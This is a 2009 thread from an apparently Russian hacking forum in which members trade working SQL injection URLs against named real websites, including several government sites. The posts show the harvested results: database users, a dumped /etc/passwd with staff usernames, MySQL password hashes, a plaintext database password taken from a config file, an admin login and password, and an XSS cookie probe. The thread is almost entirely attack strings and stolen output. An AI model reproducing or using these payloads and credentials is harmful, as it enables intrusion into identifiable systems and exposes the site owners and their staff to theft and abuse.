08.03.2009, 18:01
|
|
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
С нами:
9116712
Репутация:
688
|
|
Код:
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+concat_ ws(0x3a,version (),database(),user()),2,3--
Database Version : 5.0.67
Database name : personal-s
User name : root@localhost
читаем /etc/passwd:
Код:
# $FreeBSD: src/etc/master.passwd,v 1.40
2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie
&:/root:/bin/csh toor:*:0:0:Bourne-again
Superuser:/root: daemon:*:1:1:Owner of many system
processes:/root:/usr/sbin/nologin operator:*:2:5:System
&:/:/usr/sbin/nologin bin:*:3:7:Binaries Commands and
Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:
/usr/sbin/nologin kmem:*:5:65533:KMem Sandbox:/:
/usr/sbin/nologin games:*:7:13:Games pseudo-user:/usr
/games:/usr/sbin/nologin news:*:8:8:News Subsystem:/:
/usr/sbin/nologin man:*:9:9:Mister Man Pages:/usr/share
/man:/usr/sbin/nologin sshd:*:22:22:Secure Shell
Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool
/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool
/mqueue:/usr/sbin/nologin bind:*:53:53:Bind Sandbox:/:
/usr/sbin/nologin proxy:*:62:62:Packet Filter pseudo-
user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin
/nologin _dhcp:*:65:65:dhcp programs:/var/empty:
/usr/sbin/nologin uucp:*:66:66:UUCP pseudo-user:/var
/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin
/nologin www:*:80:80:World Wide Web
Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:
/usr/sbin/nologin techsupport:*:100:100:Technical
support group:/home/techsupport:/bin/sh
squid:*:1001:1001:Squid proxy-caching web server's
user:/nonexistent:/sbin/nologin clamav:*:106:106:Clam
Antivirus:/nonexistent:/sbin/nologin
spamd:*:58:58:SpamAssassin user:/var/spool/spamd:
/sbin/nologin v_kalinnikova:*:100:102:Email user:/home
/v_kalinnikova:/sbin/nologin office:*:101:102:Email
user:/home/office:/sbin/nologin
i_androsova:*:102:102:Email user:/home/i_androsova:
/sbin/nologin n_blagodatskaya:*:103:102:Email
user:/home/n_blagodatskaya:/sbin/nologin
i_gorlova:*:104:102:Email user:/home/i_gorlova:
/sbin/nologin p_reberka:*:105:102:Email user:/home
/p_reberka:/sbin/nologin
y_mitrophanova:*:106:102:Email user:/home
/y_mitrophanova:/sbin/nologin bnv:*:107:102:Email
user:/home/bnv:/sbin/nologin rpv:*:108:102:Email
user:/home/rpv:/sbin/nologin
k_tishenina:*:109:102:Email user:/home/k_tishenina:
/sbin/nologin oas:*:110:102:Email user:/home/hpa:/sbin
/nologin mysql:*:88:88:MySQL Daemon:/nonexistent:
/sbin/nologin backup:*:111:101:BackUp user:/var/Samba
/BackUp:/sbin/nologin a_markova:*:112:102:Email
user:/home/a_markova:/sbin/nologin
a_morokova:*:113:102:Email user:/home/a_morokova:
/sbin/nologin kmv:*:114:102:Email user:/home/omv:/sbin
/nologin ask:*:115:102:Email user:/home/ask:/sbin
/nologin bilenko:*:116:102:Email user:/home/ask:/sbin
/nologin e_kruglova:*:117:102:Email user:/home
/e_kruglova:/sbin/nologin gmp:*:118:102:Email
user:/home/gmp:/sbin/nologin mea:*:118:102:Email
user:/home/mea:/sbin/nologin konkurs:*:118:102:Email
user:/home/konkurs:/sbin/nologin
mailrobot:*:119:102:Email user:/home/mailrobot:
/sbin/nologin
оййй на чтой-то мы тут наткнулись  :
Код:
http://www.personal-s.ru/news/?action=news&do=view&object_id=-1+union+select+LOAD_ FILE(0x2f686f6d652f74656368737570706f72742f2e6874706173737764), 2,3--
|
|
|
08.03.2009, 18:08
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://www.nipne.ro/events/seminar/index.php?id=876875433456646876+union+select+1,2,3 ,4,concat_ws(0x3a,version(),user(),database()),6,7 ,8,9,10,11--
Database Version: 4.1.22
Database name: ifin-hh
User name: admusr@localhost
http://www.nipne.ro/events/seminar/index.php?id=876875433456646876+union+select+1,2,3 ,4,concat_ws(0x3a,user,password),6,7,8,9,10,11+fro m+mysql.user--
root : 556eba5e26cdd0e1
http://www.dentex.ro/index.php?id=90779888490+union+select+1,concat_ws( 0x3a,version(),user(),database()),3--
Version:4.1.22-standard-log
User:bluetech@localhost
Database:bluetech_prod
http://www.laguna-showroom.ro/stire.php?lang=en&id=7987987646987987+union+select +1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),use r(),database()),12,13,14,15,16--&name=Ceramica-Ribesalbes---colors-for-tiles-with-personality-!
Version:5.0.67-community
User:bravo@localhost
Database:bravo
http://www.imobilenoi.ro/?action=articles&id=798756544347987/**/union/**/select/**/1,concat_ws(0x3a,version(),user(),database()),3,4--
Version:5.0.67-community
User:imobilen_imnoi@localhost
Database:imobilen_imnoi
|
|
|
|
08.03.2009, 18:17
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Код:
http://www.lasvegasphilharmonic.com/about/bio.php?ID=-35'+union+select+1,2,3,4,5/*&type=M
5.0.27
Код:
http://www.nlr.net/about/bio.php?id=-7+union+select+1,2,3,4,5,6,7,8/*
5.0.45-log
Код:
http://www.mymissouri32.com/people/bio.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.45
Код:
http://www.youngstartup.com/corporate09/bio.php?id=-1068+union+select+1,2,3,3/*
4.0.20-standard
Код:
http://www.dunyakan.com/bio.php?id=-2+union+select+1,2/*&lang=en
4.1.21-standard-log
Код:
http://www.kmiz.com/people/bio.php?id=-51+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,database(),16/
*
5.0.45 |
|
|
|
08.03.2009, 18:21
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
Код:
http://www.sweetfactory.ru
Версия: 4.1.22-log
Код:
http://www.sweetfactory.ru/shok.php?gp=-39%20union%20select%201,2,3,4,5,6--
|
|
|
|
08.03.2009, 18:55
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71)--
Database Version: 4.1.10
Database name: ordinances
User name: root@192.168.2.2
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Password,0x3a,User,0x 3a),0x71),0x71)+from+mysql.user+limit+1,1--
773a716368a9f480 : phpBB
6b05b5b330c85e6e : bplt
5be75b377fe12423 : squidalyser
1ef20cb70c8499bb : dbuser:
*527B4FF4B7421D9786914C59FF8E9382BAF1978C : root
Читаем /etc/passwd
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F6574632 F706173737764),0x3a),0x71),0x71)--
Читаем /usr/home/web/www.naga.gov.ph/includes/config.php
http://www.naga.gov.ph/sp/list.php?id=587687645434687+UNION+SELECT+1,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x2F7573722 F686F6D652F7765622F7777772E6E6167612E676F762E70682 F696E636C756465732F636F6E6669672E706870),0x3a),0x7 1),0x71)--
// define our database connection
define('MYSQL_ASSOC', 'dune');
define('DB_SERVER', 'www.naga.gov.ph');
define('DB_SERVER_USERNAME', ' root');
define('DB_SERVER_PASSWORD', ' Genesis11');
//define('DB_DATABASE', 'web_apps');
И так далее..... =)
|
|
|
|
08.03.2009, 19:16
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами:
9838057
Репутация:
302
|
|
http://www.eurocups.ru/champs/table.php?id=1231234%20union%20select%201,version( ),3%20--
Database Version: 5.0.26-log
Database name: eurocupru_main
User name: eurocupru_main@localhost
|
|
|
|
08.03.2009, 19:34
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
http://www.anqing.gov.cn/include/web_view.php?id=9798654334547987+union+select+1,2, concat_ws(0x3a,version(),user(),database()),4,5,6, 7,8,9,10,11--
Version:4.0.16-standard
User:webuser@localhost
Database:web
http://www.qaia.gov.jo/inner_links_en.php?id=979864544546547987+union+sel ect+1,2,3,concat_ws(0x3a,version(),user(),database ()),5,6,7,8,9,10--
5.0.67-community-log
qaiagov_aliauser@localhost
qaiagov_alia
|
|
|
|
08.03.2009, 19:44
|
|
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
С нами:
9725544
Репутация:
246
|
|
www.fresnomag.com
Код:
http://www.fresnomag.com/news.php?ax=v&n=10&id=10&nid=-3+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5--
Version: 4.1.22-standard-log
User: fresnoma_admin@localhost
Database: fresnoma_cms
|
|
|
|
08.03.2009, 22:03
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.comsult.co.za/newnews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6
user():database():version()
comsult@ns1.pluto.co.za:comsult:5.0.51a-community-log
Код:
http://www.comsult.co.za/newnews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,username,password),6+from+users
Admin User: gwalker:hayley12
Admin Panel: http://www.comsult.co.za/admin.php
XSS: http://www.comsult.co.za/admin.php?msg=<script>alert(document.cookie)</script>
PS: Смысл этой админки не понял...
Спустя 5 мин:
Уже понял. После логина можно удалять статьи =) ыЫ
Последний раз редактировалось mailbrush; 08.03.2009 в 22:18..
|
|
|
|
08.03.2009, 22:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
SeaZone.com
PageRank = 5
Код:
http://www.seazone.com/newsNews.php?id=-999999999999+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9/*
user():database():version()
seazone@DS1004.dedicated.turbodns.co.uk:seazone:4. 1.20-community-nt-log
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
